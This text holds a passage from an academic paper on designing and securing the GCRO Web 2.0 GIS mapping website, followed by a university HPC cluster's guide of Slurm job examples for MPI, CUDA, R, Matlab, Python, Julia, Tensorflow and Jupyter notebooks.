maps. The use of Google Maps as base map layers also required that the GCRO themes used the same scales and coordinate system (WGS84 Web Mercator) as Google Maps (ESRI, 2009a). Each of the GCRO theme layers were projected to WGS84 Web Mercator and the Google Maps scale levels applied to the ArcMap documents. Scale dependencies, whereby layers only display at predetermined scales, were applied where possible to some of the GCRO layers to ensure the layers only displayed at an appropriate scale to avoid unnecessary processing by the server and improved performance. For example, the Gauteng land use layer in the Spatial Structure theme is not clearly discernable at the Gauteng extent and took a long time to draw at small scales. A scale dependency was set whereby the layer is only visible when a user zooms in beyond a scale of 1: 288 895. 2.3 Step3: Tune the maps to optimise performance To ensure that the maps that users request are rendered by the server as quickly as possible, it is necessary to tune the maps to optimise performance. 2.3.1 Using the Map Service Publishing toolbar The desktop software (ArcMap version 9.3.1) used to design the Web maps for the GCRO GIS website, provides a new tool called the Map Service Publishing toolbar, to analyse the performance of each of the layers in the ArcMap map document. The Analyse map button provides the main functionality as it cycles through each layer and generates a report indentifying potential performance bottlenecks and/or errors that must be addressed before a map service is published (Agrios, 2009:46). As visible in Figure 4, a dialog box opens at the bottom of ArcMap application when the analyse tool is run and contains errors, warnings and messages. These guide the user to: - Identify errors that may prevent the service from being published (which in the case of the .msd file format, must be resolved before saving), - Resolve warnings to ensure optimal performance from the published map service. The preview window tests the draw speed of the layers at different scales and provides the developer with an opportunity to test the effect of changing various settings on draw speeds before implementing the optimal Web map drawing settings. 2.3.2 GIS data formats The format of the GIS data is another factor that may influence performance. ESRI advises that an enterprise ArcSDE geodatabase should be used for large ArcGIS Server system implementations, as ArcSDE provides benefits such as high-availability support, backup and recovery, concurrency, scalability and a tendency to provide superior performance (ESRI, 2009b). However, the performance of map services sourcing data from an ArcSDE geodatabase is dependent on a dedicated database administrator to tune, optimise and maintain the ArcSDE geodatabase. Provided that the published data is relatively static and enterprise capabilities of ArcSDE such as versioning are not required, a file geodatabase offers a good alternative to serve Web GIS data, as they provide great performance with minimal extra configuration (ESRI, 2009b). For this reason, all the vector data accessed by the GCRO GIS application are stored in file geodatabases. Various server hardware, network and scalability configurations will also affect the Web map’s performance, but are beyond the scope of this paper. 2.4 Step 4: Publishing the maps as Web services 2.4.1 Map Service Definition (MSD) format According to Agrios (2009:47), depending on how the map will be used and the type of data it contains, a user has the choice of saving the ArcMap documents in one of two formats used to publish the map services: - **MXD**: if the map user’s layers are “not supported by the 9.3.1 optimised rendering engine” (Agrios, 2009:47), for example, dot density symbology, or the published map service uses analysis tasks such as geoprocessing. - **MSD**: if the map service will be served dynamically and only provide mapping, KML (Keyhole Markup Language) or WMS (Web Map Service) capabilities. The MSD (Map Service Definition) format is an optimised version of the standard ArcMap .mxd project document file format specifically designed to enhance the performance of published map services (ESRI, 2009b). Cached maps may provide the best performance for serving GIS data, with less load placed on the server (ESRI, 2009c), but dynamic MSD services provide a good alternative, having the additional advantages such as providing users with the flexibility to toggle the visibility of individual layers and the ability to serve the updated data as soon as the geodatabase is updated (Agrios, 2009:47). None of the GCRO themes could be cached because of the dynamic MXD/MSD functionality that was required in the application (such as dynamically switching on and off individual layers within each theme). However, good response times for rendering the map services were achieved due to the use of the cached Google Maps base layers, and in most cases, only a couple of dynamic GCRO theme layers switched on at any point in time. The result: a vast improvement in server response times and reduced server load compared to earlier GIS website applications using older Web GIS software such as ESRI ArcIMS Web GIS software, which required the server to render all the visible layers. Four of the GCRO themes (GCRO Administrative layers, 2009 Quality of Life, Spatial Structure and Transport) were published as optimised MSD map services using the Publish to ArcGIS Server tool, within the Map Service Publishing toolbar. Two of the themes had to be published as MXDs due to the dynamic cartographic symbology used to visually represent the Census 2001 population and unemployment data as dot density maps, which is not supported in the MSD format. 2.4.2 Securing Web mapping services Securing Web services is an important part of securing a Web application, especially in the case of potentially sensitive government information. Various techniques were implemented to safe guard the GCRO GIS server and Web services, including: - Hosting the GCRO GIS server in a secure data centre that deploys security measures such as IPS (Intrusion Prevention System), which is designed to monitor the network and system activities for malicious activities and attempt to block and report any malicious activity (Wikipedia contributors, 2010). • Role based authentication that was applied to the GCRO GIS Web services to ensure that only authorised users can access the map services through the Web. • A security token that was implemented in the GCRO GIS viewer to allow the GCRO GIS application to access the map services without the need for user names and passwords. According to Fu and Sun (2011b:86), further security measures that can be used to secure GIS data published as Web services include: • The use of a private network if the Web service and clients are on a separate private network. • The use of a VPN (Virtual Private Network) to enable secure connections across the Internet. • Implementing HTTPS (Secure Hypertext Transfer Protocol) which encrypts the data transferred between the Web service and client. • Installing a reverse proxy that provides an additional layer of defence by masking the Web server behind the reverse proxy. 2.5 Step 5: Web application development Once the optimised, tuned map services have been published, a Web GIS application is required to serve the GIS data. ESRI provides a range of RIA Web 2.0 software development kits (SDKs) such as Web mapping APIs and application development frameworks to build dynamic applications that access the ArcGIS Server services (ESRI, 2009c). These include: Java, Adobe Flex, Microsoft SharePoint, .NET and Silverlight. The availability of programming skills is the most important factor to consider when deciding which software and APIs to use to develop a GIS website (ESRI, 2009c). The GIS viewer was developed by two student interns from the JCSE (Johannesburg Centre for Software Engineering) based at Wits (JCSE, 2010), who had no prior development experience with any of the ESRI Web APIs. However, as an increasing number of ESRI Adobe Flex websites were being developed and deployed, it was decided to develop using the ESRI Adobe Flex sample viewer. Flex is based on an “open source framework for building expressive Web applications that deploy consistently on all major browsers, desktops, and operating systems by leveraging the Adobe® Flash® Player and Adobe AIR® runtimes” (Adobe, 2010) and deploys across all browsers and operating systems. The basic structure of the GCRO Web GIS application prototype is illustrated in Figure 5 and was developed by customising ESRI Flex sample viewer version 1.3 with the ESRI Flex API version 1.3 and Google Maps API for Flash, to incorporate the GCRO design and functionality detailed in the specification. An advantage of customising the sample viewer is that all the base functionality and tools such as navigation tools, basic searches and drawing tools were already included. Only the additional tools that the GCRO required, such as dynamic themes and graphs, had to be developed. However, a cautionary note is provided by Noyle and Bouwman (2010:42): with the wealth of development tools, developers should consider only including the essential tools from sample viewers and design them to be intuitively obvious to the user. The prototype development was completed by June 2010 when it was presented to the GCRO and GPG Department of Economic Development staff. The response was extremely favourable and the prototype viewer specification was refined to include enhancements and staff suggestions made during the prototype presentation. Version 1.0 of the GCRO GIS website was released and publically launched on 1 September 2010. 3. GCRO GIS website The GCRO GIS website is viewable in all the main Internet browsers (such as Internet Explorer, Safari, Firefox and Google Chrome), but does require a reasonable broadband Internet connection and the Adobe Flash Player plug-in (version 9) to be installed. It is accessed from the GCRO website (www.gcro.ac.za) by selecting the Interactive GIS link. The website consists of the mapping window that utilises the full extent of the browser window and the main user interface in the top left corner with the website tools grouped into: base data, dynamic themes, navigation tools (which are also easily accessible on the main interface), website tools and help. Some of the tools and themes pop up on the right hand side of the viewer when selected. Figure 6: GCRO GIS website (Wray, 2011:76) Users interact with the data by selecting the appropriate Google Maps base layer and then overlay the various GCRO GIS layers from each of the GCRO themes. Two different search tools are available. The first is a Google search which utilises the power of the Google Maps search engine and allows the user to search for a point of interest, street address or any other feature stored in the Google Maps database. The GCRO search provides for searches on specific GCRO layer such as local municipalities or wards. There is also an identify, draw and printing tool, which allows the user to choose a base layer and print to an A4 landscape or pdf file. Finally, a comprehensive help page is provided that explains each tool in detail. An example of dynamic Web 2.0 RIA functionality is provided in Figure 7, which depicts the visualisation of the 2009 Quality of Life survey, with the satisfaction with local government layer displayed on the map and dissatisfaction with government drawn in the graph. Figure 7: 2009 Quality of Life dynamic theme with graph (Wray, 2011:80) The Technology Acceptance Model (TAM), the most widely employed model of IT adoption and use (Venkatesh and Bala, 2008:274), was used to determine the success of the GCRO g-government website by measuring user acceptance at the prototype and implementation stages of the project. High user acceptance scores were achieved for perceived usefulness, perceived ease of use and data quality across both professional technical and non-GIS management staff (Wray, 2011:87). An average score of 6.82 out of a maximum of 7.00 for behavioural intention to use, indicates the intention of the questionnaire respondents to utilise the GCRO GIS website, and that the Web GIS design met the needs of the its intended users (Wray, 2011:87). 4. Conclusion Web 2.0 technologies such as the Google Maps mashups and the RIA tools available in the ESRI Flex sample viewer, have been successfully combined with the dynamic maps and graphs of the GCRO government datasets to provide a g-government website for the GCR. The GCRO GIS website offers comprehensive base data and thematic layers covering the GCR, and is fast and easy to use, with a fun element of RIA popup windows and dynamic graphs. A five step Web 2.0 GIS website design methodology was utilised to guide the entire project and ensure an optimal functioning application with responsive and secure map services, by applying various Web mapping optimisation techniques. These include: - Designing the maps for a Web application by separating the data into base maps and operational layers. - Making Web mapping compromises such as setting scale dependencies and using common coordinate systems for all data mashup layers. - Serving cached or optimised MSD Web services. - Tuning the maps for optimal map service performance. As more online data sources and mapping applications are becoming available, developers should take note of Web GIS design and optimisation techniques (such as the design methodology discussed in this paper) to be applied to Web applications containing GIS data. 5. List of references Hughes, H., Macmillan, P. and Medd, A. 2008. Change your world or the world will change you: The future of collaborative government and Web 2.0. Available
{"Source-Url": "https://ujcontent.uj.ac.za/vital/access/services/Download/uj:6057/CONTENT1", "len_cl100k_base": 5858, "olmocr-version": "0.1.50", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 38708, "total-output-tokens": 7873, "length": "2e12", "weborganizer": {"__label__adult": 0.00034236907958984375, "__label__art_design": 0.0011167526245117188, "__label__crime_law": 0.0008025169372558594, "__label__education_jobs": 0.002838134765625, "__label__entertainment": 0.0001392364501953125, "__label__fashion_beauty": 0.0001933574676513672, "__label__finance_business": 0.0009794235229492188, "__label__food_dining": 0.0003399848937988281, "__label__games": 0.0006604194641113281, "__label__hardware": 0.0019702911376953125, "__label__health": 0.0003960132598876953, "__label__history": 0.00298309326171875, "__label__home_hobbies": 0.00012385845184326172, "__label__industrial": 0.0005655288696289062, "__label__literature": 0.0003502368927001953, "__label__politics": 0.00131988525390625, "__label__religion": 0.0004086494445800781, "__label__science_tech": 0.1597900390625, "__label__social_life": 0.0001589059829711914, "__label__software": 0.12060546875, "__label__software_dev": 0.7021484375, "__label__sports_fitness": 0.00019109249114990232, "__label__transportation": 0.0009927749633789062, "__label__travel": 0.0005903244018554688}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31964, 0.03827]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31964, 0.52096]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31964, 0.89743]], "google_gemma-3-12b-it_contains_pii": [[0, 2382, false], [2382, 5916, null], [5916, 8923, null], [8923, 10741, null], [10741, 12686, null], [12686, 14533, null], [14533, 16541, null], [16541, 17650, null], [17650, 20666, null], [20666, 22871, null], [22871, 24107, null], [24107, 25819, null], [25819, 27172, null], [27172, 29854, null], [29854, 31964, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2382, true], [2382, 5916, null], [5916, 8923, null], [8923, 10741, null], [10741, 12686, null], [12686, 14533, null], [14533, 16541, null], [16541, 17650, null], [17650, 20666, null], [20666, 22871, null], [22871, 24107, null], [24107, 25819, null], [25819, 27172, null], [27172, 29854, null], [29854, 31964, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31964, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31964, null]], "pdf_page_numbers": [[0, 2382, 1], [2382, 5916, 2], [5916, 8923, 3], [8923, 10741, 4], [10741, 12686, 5], [12686, 14533, 6], [14533, 16541, 7], [16541, 17650, 8], [17650, 20666, 9], [20666, 22871, 10], [22871, 24107, 11], [24107, 25819, 12], [25819, 27172, 13], [27172, 29854, 14], [29854, 31964, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31964, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
c9e861b5d2565f6603dc280d495b9c3a65bd9474
Habanero - Job Examples - Hello World - C/C++/Fortran - C/C++/Fortran MPI - GPU (CUDA C/C++) - Example of R run - Installing R Packages on Habanero - Local Installation - Matlab - Python and JULIA - Tensorflow - Jupyter Notebooks In order for the scripts in these examples to work, you will need to replace <ACCOUNT> with your group's account name. Hello World This script will print "Hello World", sleep for 10 seconds, and then print the time and date. The output will be written to a file in your current directory. ```bash #!/bin/sh # # Simple "Hello World" submit script for Slurm. # # Replace <ACCOUNT> with your account name before submitting. #SBATCH --account=<ACCOUNT> # The account name for the job. #SBATCH --job-name=HelloWorld # The job name. #SBATCH -c 1 # The number of cpu cores to use. #SBATCH --time=1:00 # The time the job will take to run. #SBATCH --mem-per-cpu=1gb # The memory the job will use per cpu core. echo "Hello World" sleep 10 date # End of script ``` C/C++/Fortran To submit a precompiled binary to run on Habanero, the script will look just as it does in the Hello World example. The difference is that you will call your executable file instead of the shell commands "echo", "sleep", and "date". C/C++/Fortran MPI Intel Parallel Studio Habanero supports Intel Parallel Studio which provides a version of MPI derived from MPICH2. We encourage users to avail themselves of Intel MPI because it is faster and more modern than other versions. Also, all nodes on the cluster have Infiniband transport and that is the fabric that MPI jobs avail themselves of - which is another reason for a substantial boost of efficiency on the cluster. To use Intel MPI, you must load the Intel module first: module load intel-parallel-studio/2017 mpiexec ./myprogram In order to take advantage of Habanero architecture, your program should be (re)compiled on the cluster even if you used Intel for compiling it on another cluster (like Yeti). It is important to compile with the compiler provided by the module mentioned above. Note that you may have to set additional environment variables in order to successfully compile your program. These are the locations of the C and Fortran compilers for Intel Studio: $ module load intel-parallel-studio/2017 (...) $ which mpiicc /rigel/opt/parallel_studio_xe_2017/compilers_and_libraries_2017.0.098/linux/mpi/intel64/bin/mpiicc $ which ifort /rigel/opt/parallel_studio_xe_2017/compilers_and_libraries_2017.0.098/linux/bin/intel64/ifort For programs written in C, use mpiicc in order to compile them: $ mpiicc -o <MPI_OUTFILE> <MPI_INFILE.c> The submit script below, named pi_mpi.sh, assumes that you have compiled a simple MPI program used to compute pi, (see mpi_test.c), and created a binary called pi_mpi: #!/bin/sh #SBATCH -A <ACCOUNT> #SBATCH --time=30 #SBATCH -N 2 #SBATCH --exclusive module load intel-parallel-studio/2017 mpiexec -bootstrap slurm ./pi_mpi # End of script The --exclusive flag will ensure that full nodes are being used in the runs (that's the reason why no memory specification is given). Each available core will give rise to another MPI thread. Without the flag, you can specify the number of tasks, or tasks per node, in order to limit the number of threads that will be created. For example, you can replace the directive containing the flag by: #SBATCH -N 2 #SBATCH --ntasks-per-node=4 - and your MPI code will run on 8 threads, with 4 on each of the 2 nodes requested. **Job Submission** ``` $ sbatch pi_mpi.sh ``` **OpenMPI** Habanero supports also OpenMPI from the GNU family. To use OpenMPI, you must load the following module instead: ``` module load openmpi/gcc/64 mpiexec myprogram ``` Your program must be compiled on the cluster. You can use the the module command as explained above to set your path so that the corresponding *mpicc* will be found. Note that you may have to set additional environment variables in order to successfully compile your program. ``` $ module load openmpi/gcc/64 $ which mpicc /rigel/opt/openmpi-2.0.1/bin/mpicc ``` Compile your program using *mpicc*. For programs written in C: ``` $ mpicc -o <MPI_OUTFILE> <MPI_INFILE.c> ``` **GPU (CUDA C/C++)** The cluster includes two types of GPU servers: Nvidia K80s and Nvidia P100s. - There are 14 K80 GPU servers, each with two dual K80 Tesla GPU accelerators, for a total of 4 GPU modules per server. - There are 13 P100 servers, each with two P100 accelerators, for a total of 2 GPU modules per P100 server. To use a GPU server you must specify the *--gres=gpu* option in your submit request, followed by a colon and the number of GPU modules you require (with a maximum of 4 per server for K80s and 2 per server for P100s). Use the *--constraint=k80* or *--constraint=p100* directive if you'd like to request a specific type of GPU (k80 or P100). Request a **K80** gpu, specify this in your submit script. To request a **P100** gpu, specify this in your submit script: ``` #SBATCH --constraint=p100 ``` Not all applications have GPU support, but some, such as MATLAB, have built-in GPU support and can be configured to use GPUs. To build your CUDA code and run it on the GPU modules you must first set your paths so that the Nvidia compiler can be found. Please note you must be logged into a GPU node to access these commands. To login interactively to a GPU node, run the following command, replacing `<ACCOUNT>` with your account. ``` $ srun --pty -t 0-01:00 --gres=gpu:1 -A <ACCOUNT> /bin/bash ``` Load the cuda environment module which will add cuda to your PATH and set related environment variables. Note cuda 8.0 does not support gcc 6, so gcc 5 or earlier must be accessible in your environment when running nvcc. ``` $ module load gcc/4.8.5 ``` Load the cuda module. ``` $ module load cuda80/toolkit ``` You then have to compile your program using `nvcc`: ``` $ nvcc -o <EXECUTABLE_NAME> <FILE_NAME.cu> ``` You can compile `hello_world.cu` sample code which can be built with the following command: ``` $ nvcc -o hello_world hello_world.cu ``` For non-trivial code samples, refer to Nvidia’s [CUDA Toolkit Documentation](https://docs.nvidia.com/cuda/index.html). A Slurm script template, `gpu.sh`, that can be used to submit this job is shown below: #!/bin/sh #SBATCH --account=<ACCOUNT> # The account name for the job. #SBATCH --job-name=HelloWorld # The job name. #SBATCH --gres=gpu:1 # Request 1 gpu (Up to 4 on K80s, or up to 2 on P100s are valid). #SBATCH -c 1 # The number of cpu cores to use. #SBATCH --time=1:00 # The time the job will take to run. #SBATCH --mem-per-cpu=1gb # The memory the job will use per cpu core. module load cuda80/toolkit ./hello_world # End of script Job submission $ sbatch gpu.sh This program will print out "Hello World!!" when run on a gpu server or print "Hello Hello" when no gpu module is found. Example of R run For this example, the R code below is used to generate a graph "Rplot.pdf" of a discrete Delta-hedging of a call. It hedges along a path and repeats over many paths. There are two R files required: hedge.R BlackScholesFormula.R A Slurm script, hedge.sh, that can be used to submit this job is presented below: Batch queue submission $ sbatch hedge.sh This program will leave several files in the output directory: slurm-<jobid>.out, Rplots.pdf, and routput (the first one will be empty). Installing R Packages on Habanero HPC users have two options for R packages: 1. Install packages locally in your user space that can be called by your programs (faster, see below). 2. E-mail hpc-support@columbia.edu and request a package to be installed on all HPC nodes (slower). Local Installation After logging in to Habanero, start R: $ module load R $ R You can see the default library paths (where R looks for packages) by calling .libPaths(): These paths are all read-only, and so you cannot install packages to them. To fix this, we will tell R to look in additional places for packages. Exit R and create a directory rpackages in /rigel/<GROUP>/users/<UNI>/. $ mkdir /rigel/<GROUP>/users/<UNI>/rpackages Go back into R and add this path to .libPaths() $ R > .libPaths("/rigel/<GROUP>/users/<UNI>/rpackages/") Call .libPaths() to make sure the path has been added > .libPaths() [1] "/rigel/<GROUP>/users/<UNI>/rpackages/" [2] "/usr/lib64/R/site-library" [3] "/usr/lib64/R/library" To install a package, such as the "sm" package, tell R to put the package in your newly created local library: > install.packages("sm", lib="/rigel/<GROUP>/users/<UNI>/rpackages") Select appropriate mirror and follow install instructions. Test to see if package can be called: > library(sm) Package 'sm', version 2.2-3; Copyright (C) 1997, 2000, 2005, 2007 A.W.Bowman & A.Azzalini help(sm) for summary information In order to access this library from your programs, make sure you add the following line to the top of every program: .libPaths("/rigel/<GROUP>/users/<UNI>/rpackages/") Since R will know where to look for libraries, a call to library(sm) will be successful (however, this line is not necessary per se for the install.packages(...) call, as the directory is already specified in it). Matlab Matlab (single thread) The file linked below is a Matlab M-file containing a single function, simPoissGLM, that takes one argument (lambda). ``` simPoissGLM.m ``` A Slurm script, simpoiss.sh, that can be used to submit this job is presented below (implicitly, --cpu-per-task=1). ``` #!/bin/sh # # Simple Matlab submit script for Slurm. # #SBATCH -A astro # The account name for the job. #SBATCH -J SimpleMLJob # The job name. #SBATCH -t 1:00 # The time the job will take to run. #SBATCH --mem-per-cpu=1gb # The memory the job will use per cpu core. module load matlab echo "Launching an Matlab run" date #define parameter lambda LAMBDA=10 #Command to execute Matlab code matlab -nosplash -nodisplay -nodesktop -r "simPoissGLM($LAMBDA)" # > matoutfile # End of script ``` Batch queue submission ``` $ sbatch simpoiss.sh ``` This program will leave several files in the output directory: slurm-<jobid>.out, out.mat, and matoutfile. Matlab (multi-threading) Matlab has built-in implicit multi-threading (even without applying its Parallel Computing Toolbox, PCT), which causes it to use several cores on the node it is running on. It consumes the number of cores assigned by Slurm. The user can activate explicit (PCT) multi-threading by specifying the number of cores desired also in the Matlab program. The Torque submit script (simpoiss.sh) should contain the following line: ``` #SBATCH --c 6 ``` The -c flag determines the number of cores (up to 24 are allowed). For explicit multi-threading, the users must include the following corresponding statement within their Matlab program: parpool('local', 6) The second argument passed to parpool must equal the number specified with the ppn directive. Users who are acquainted with the use of commands like parfor need to specify explicit multi-threading with the help of parpool command above. Note: maxNumCompThreads() is being deprecated by Mathworks. It is being replaced by parpool: The command to execute Matlab code remains unchanged from the single thread example above. Important note: On Yeti, where Matlab was single thread by default, it appeared that the more recent versions of Matlab took liberties to grab all the cores within a node even when fewer (or even only one) cores were specified as above. On Habanero, we believe this has been addressed by implementing a system mechanism which enforces the proper usage of the number of specified cores. Python and JULIA To use python you need to use: ```bash $ module load anaconda ``` Here's a simple python program called "example.py" – it has just one line: ```python print("Hello, World!") ``` To submit it on the Habanero Cluster, use the submit script "example.sh" ```bash #!/bin/sh # # Simple "Hello World" submit script for Slurm. # #SBATCH --account=astro # The account name for the job. #SBATCH --job-name=HelloWorld # The job name. #SBATCH -c 1 # The number of cpu cores to use. #SBATCH --time=1:00 # The time the job will take to run. #SBATCH --mem-per-cpu=1gb # The memory the job will use per cpu core. module load anaconda #Command to execute Python program python example.py #End of script ``` If you use "ls" command you should see 2 programs: ``` example.sh example.py ``` To submit it - please use: ```bash $ sbatch example.sh ``` To check the output use: ```bash $ cat slurm-463023.out Hello, World! ``` Similarly, here is the "julia_example.jl" with just one line ```bash $ cat julia_example.jl println("hello world") ``` and ```bash $ cat julia_example.sh ``` ``` #!/bin/sh # # Simple "Hello World" submit script for Slurm. # #SBATCH --account=hblab # The account name for the job. #SBATCH --job-name=HelloWorld # The job name. #SBATCH -c 1 # The number of cpu cores to use. #SBATCH --time=1:00 # The time the job will take to run. #SBATCH --mem-per-cpu=1gb # The memory the job will use per cpu core. module load julia #Command to execute Python program julia julia_example.jl #End of script ``` After you finish creating those two files, if you use "ls" command you should see: ``` julia_example.jl julia_example.sh ``` To submit it use: ``` $ sbatch julia_example.sh Submitted batch job 463030 ``` To check the output ``` $ cat slurm-463030.out hello world ``` **Julia Interactive Session Usage:** **Step 1 >> start an interactive session (*** use "astro" if you are a member of "astro" group, otherwise use your group name):** ``` $ srun --pty -t 0-04:00 -A astro /bin/bash $ module load julia/0.5.1 $ julia julia_example.jl hello world $ julia _ _ _(_)_ _) | A fresh approach to technical computing ( ) | ( ) (_) | Documentation: http://docs.julialang.org _ _ _| _ _ _| _ _ _| Type ":help" for help. | | | | | | | /` | | | | | | | ( | | | Version 0.5.1 (2017-03-05 13:25 UTC) `/ | | | | | "'":"' | Official http://julialang.org/ release |__| | x86_64-pc-linux-gnu julia> To quit Julia use "CTRL +D" ``` **Tensorflow** This is how you can import tensorflow on GPU node: (*** use "astro" if you are a member of "astro" group, otherwise use your group name): First request a GPU node on Habanero: ``` $ srun --pty -t 0-02:00:00 --gres=gpu:1 -A astro /bin/bash ``` Load these modules: $ module load cuda80/toolkit cuda80/blas cudnn/6.0_8 $ module load anaconda/2-4.2.0 Install tensorflow-gpu as user (this can take few minutes, please wait - you need to do it only once): $ pip install tensorflow-gpu --user Start python and test tensorflow $ python Python 2.7.12 |Anaconda 4.2.0 (64-bit)| (default, Jul 2 2016, 17:42:40) >>> import tensorflow as tf I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcublas.so.8.0 locally I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcudnn.so.5 locally I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcufft.so.8.0 locally I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcuda.so.1 locally I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcurand.so.8.0 locally >>> hello = tf.constant('Hello, TensorFlow!') >>> sess = tf.Session() name: Tesla K80 major: 3 minor: 7 memoryClockRate (GHz) 0.8235 ciBusID 0000:83:00.0 Total memory: 11.20GiB Free memory: 11.13GiB I tensorflow/core/common_runtime/gpu/gpu_device.cc:906] DMA: 0 I tensorflow/core/common_runtime/gpu/gpu_device.cc:916] 0: Y I tensorflow/core/common_runtime/gpu/gpu_device.cc:975] Creating TensorFlow device (/gpu:0) -> (device: 0, name: Tesla K80, pci bus id: 0000:83:00.0) >>> print(sess.run(hello)) Hello, TensorFlow! Jupyter Notebooks This is one way to set up and run a jupyter notebook on Habanero. As your notebook will listen on a port that will be accessible to anyone logged in on a submit node you should first create a password. Creating a Password The following steps can be run on the submit node or in an interactive job. 1. Load the anaconda python module. ``` $ module load anaconda ``` 2. If you haven’t already done so, initialize your jupyter environment. ``` $ jupyter notebook --generate-config ``` 3. Start a python or ipython session. ``` $ ipython ``` 4. Run the password hash generator. You will be prompted for a password, prompted again to verify, and then a hash of that password will be displayed. ``` In [1]: from notebook.auth import passwd; passwd() Enter password: Verify password: Out[1]: 'sha1:60bdb1:306fe0101ca73be2429edbab0935c545' ``` 5. Cut and paste the hash into ~/.jupyter/jupyter_notebook_config.py (Important: the following line in the file is commented out by default so please uncomment it first) ``` c.NotebookApp.password = 'sha1:60bdb1:306fe0101ca73be2429edbab0935c545' ``` Setting the password will prevent other users from having access to your notebook and potentially causing confusion. Running a Jupyter Notebook 1. Log in to the submit node. Start an interactive job. ``` $ srun --pty -t 0-01:00 -A <ACCOUNT> /bin/bash ``` 2. Get rid of XDG_RUNTIME_DIR environment variable $ unset XDG_RUNTIME_DIR 3. Load the anaconda environment module. $ module load anaconda 4. Look up the IP of the node your interactive job is running on. $ hostname -i 10.43.4.206 5. Start the jupyter notebook, specifying the node IP. $ jupyter notebook --no-browser --ip=10.43.4.206 6. Look for the following line in the startup output to get the port number. The Jupyter Notebook is running at: http://10.43.4.206:8888/ 7. From your local system, open a second connection to Habanero that forwards a local port to the remote node and port. Replace UNI below with your uni. $ ssh -L 8080:10.43.4.206:8888 UNI@habanero.rcs.columbia.edu 8. Open a browser session on your desktop and enter the URL 'localhost:8080' (i.e. the string within the single quotes) into its search field. You should now see the notebook.
{"Source-Url": "https://confluence.columbia.edu/confluence/download/temp/pdfexport-20180124-240118-0936-4993/rcs-Habanero-JobExamples-240118-0936-4994.pdf?contentType=application/pdf", "len_cl100k_base": 4881, "olmocr-version": "0.1.50", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 24065, "total-output-tokens": 5897, "length": "2e12", "weborganizer": {"__label__adult": 0.0002651214599609375, "__label__art_design": 0.00033020973205566406, "__label__crime_law": 0.00017762184143066406, "__label__education_jobs": 0.00107574462890625, "__label__entertainment": 0.00013887882232666016, "__label__fashion_beauty": 9.769201278686523e-05, "__label__finance_business": 0.0001767873764038086, "__label__food_dining": 0.0002510547637939453, "__label__games": 0.0007448196411132812, "__label__hardware": 0.00215911865234375, "__label__health": 0.00018894672393798828, "__label__history": 0.00019729137420654297, "__label__home_hobbies": 9.846687316894533e-05, "__label__industrial": 0.0004544258117675781, "__label__literature": 0.0001779794692993164, "__label__politics": 0.000152587890625, "__label__religion": 0.0004181861877441406, "__label__science_tech": 0.036346435546875, "__label__social_life": 0.00014257431030273438, "__label__software": 0.05413818359375, "__label__software_dev": 0.90185546875, "__label__sports_fitness": 0.00019419193267822263, "__label__transportation": 0.00027561187744140625, "__label__travel": 0.00016176700592041016}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18255, 0.02577]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18255, 0.34388]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18255, 0.74971]], "google_gemma-3-12b-it_contains_pii": [[0, 1763, false], [1763, 3382, null], [3382, 4945, null], [4945, 6313, null], [6313, 7297, null], [7297, 7934, null], [7934, 9316, null], [9316, 10943, null], [10943, 12574, null], [12574, 13440, null], [13440, 14524, null], [14524, 16160, null], [16160, 17433, null], [17433, 18255, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1763, true], [1763, 3382, null], [3382, 4945, null], [4945, 6313, null], [6313, 7297, null], [7297, 7934, null], [7934, 9316, null], [9316, 10943, null], [10943, 12574, null], [12574, 13440, null], [13440, 14524, null], [14524, 16160, null], [16160, 17433, null], [17433, 18255, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18255, null]], 